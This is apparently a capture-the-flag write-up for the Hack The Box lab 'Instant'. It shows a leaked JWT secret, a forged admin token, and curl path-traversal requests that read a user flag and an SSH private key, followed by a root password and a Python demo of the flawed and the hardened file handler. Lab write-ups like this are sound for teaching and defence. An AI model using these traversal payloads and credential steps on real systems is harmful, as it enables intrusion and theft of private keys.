Instant HTB Writeup

HTB machine link:

https://app.hackthebox.com/machines/Instant

Recon

sudo echo "10.10.11.37 instant.htb" | sudo tee -a /etc/hosts

Go to the website

Clicking the ‘DOWNLOAD NOW’ button downloads the APK file:

wget http://instant.htb/downloads/instant.apk

Extract the JWT from the APK file. JWT secret key - VeryStrongS3cretKeyY0uC4NTGET

Quick Solve

sudo echo "10.10.11.37 swagger-ui.instant.htb" | sudo tee -a /etc/hosts

User flag

curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=..%2Fuser.txt" -H "accept: application/json" -H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"

Root flag

Get the RSA private key:

curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=..%2F.ssh%2Fid_rsa" -H  "accept: application/json" -H  "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"

Copy the RSA private key into id_rsa:

nano id_rsa
chmod 600 id_rsa
ssh -i id_rsa [email protected]

su root

root password - 12**24nzC!r0c%q12

cat /root/root.txt
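
Both read/log requests above pass a log_file_name that climbs out of the log directory (..%2Fuser.txt and ..%2F.ssh%2Fid_rsa), which is consistent with the server joining that parameter onto a base path without confining it. The Python below is an added example, not code from the Instant application or from this writeup; the directory layout, file contents and function names are constructed. It replays the two parameter values against a vulnerable join and against a handler that resolves the path and refuses anything outside the log directory.

```python
import tempfile
from pathlib import Path
from urllib.parse import unquote


def read_log_unsafe(log_dir: Path, log_file_name: str) -> str:
    """Vulnerable pattern: joins the parameter onto the log directory as-is."""
    return (log_dir / log_file_name).read_text()


def read_log_safe(log_dir: Path, log_file_name: str) -> str:
    """Hardened pattern: only regular files that resolve inside log_dir are served."""
    base = log_dir.resolve()
    # resolve() collapses ../ segments and follows symlinks; an absolute
    # log_file_name replaces base entirely and fails the containment check too.
    target = (base / log_file_name).resolve()
    if not target.is_relative_to(base) or not target.is_file():
        raise PermissionError(f"rejected log_file_name: {log_file_name!r}")
    return target.read_text()


def demo() -> dict:
    """Build a constructed home directory and replay the writeup's parameter values."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        home = Path(tmp) / "home"
        logs = home / "logs"  # hypothetical log directory (assumption)
        (home / ".ssh").mkdir(parents=True)
        logs.mkdir()
        (home / "user.txt").write_text("CONSTRUCTED-FLAG")
        (home / ".ssh" / "id_rsa").write_text("CONSTRUCTED-KEY")
        (logs / "1.log").write_text("constructed log line")

        for raw in ("1.log", "..%2Fuser.txt", "..%2F.ssh%2Fid_rsa"):
            name = unquote(raw)  # a web framework decodes %2F before the handler runs
            unsafe = read_log_unsafe(logs, name)
            try:
                safe = read_log_safe(logs, name)
            except PermissionError:
                safe = None  # request refused by the hardened handler
            results[raw] = (unsafe, safe)
    return results


if __name__ == "__main__":
    for raw, (unsafe, safe) in demo().items():
        print(f"{raw:22} unsafe={unsafe!r:24} safe={safe!r}")
```

Path.is_relative_to requires Python 3.9 or later.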